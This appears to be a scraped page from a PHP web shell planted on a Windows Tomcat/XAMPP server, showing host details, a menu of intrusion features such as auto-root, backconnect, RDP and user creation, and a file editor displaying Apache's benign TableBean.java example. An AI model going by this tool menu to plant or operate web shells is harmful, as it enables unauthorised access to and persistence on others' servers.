Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
xampp7 /
tomcat /
webapps /
examples /
jsp /
cal /
[ HOME SHELL ]
Name
Size
Permission
Action
Entries.java.html
1.99
KB
-rw-rw-rw-
Entry.java.html
1.48
KB
-rw-rw-rw-
JspCalendar.java.html
4.05
KB
-rw-rw-rw-
TableBean.java.html
3
KB
-rw-rw-rw-
cal1.jsp
2.33
KB
-rw-rw-rw-
cal1.jsp.html
2.57
KB
-rw-rw-rw-
cal2.jsp
1.48
KB
-rw-rw-rw-
cal2.jsp.html
1.62
KB
-rw-rw-rw-
calendar.html
1.66
KB
-rw-rw-rw-
login.html
1.52
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : TableBean.java.html
<html><body><pre> /* * Licensed to the Apache Software Foundation (ASF) under one or more * contributor license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright ownership. * The ASF licenses this file to You under the Apache License, Version 2.0 * (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package cal; import java.util.Hashtable; import javax.servlet.http.HttpServletRequest; public class TableBean { Hashtable<String, Entries> table; JspCalendar JspCal; Entries entries; String date; String name = null; String email = null; boolean processError = false; public TableBean() { this.table = new Hashtable<String, Entries>(10); this.JspCal = new JspCalendar(); this.date = JspCal.getCurrentDate(); } public void setName(String nm) { this.name = nm; } public String getName() { return this.name; } public void setEmail(String mail) { this.email = mail; } public String getEmail() { return this.email; } public String getDate() { return this.date; } public Entries getEntries() { return this.entries; } public void processRequest(HttpServletRequest request) { // Get the name and e-mail. this.processError = false; if (name == null || name.equals("")) setName(request.getParameter("name")); if (email == null || email.equals("")) setEmail(request.getParameter("email")); if (name == null || email == null || name.equals("") || email.equals("")) { this.processError = true; return; } // Get the date. String dateR = request.getParameter("date"); if (dateR == null) date = JspCal.getCurrentDate(); else if (dateR.equalsIgnoreCase("next")) date = JspCal.getNextDate(); else if (dateR.equalsIgnoreCase("prev")) date = JspCal.getPrevDate(); entries = table.get(date); if (entries == null) { entries = new Entries(); table.put(date, entries); } // If time is provided add the event. String time = request.getParameter("time"); if (time != null) entries.processRequest(request, time); } public boolean getProcessError() { return this.processError; } } </pre></body></html>
Close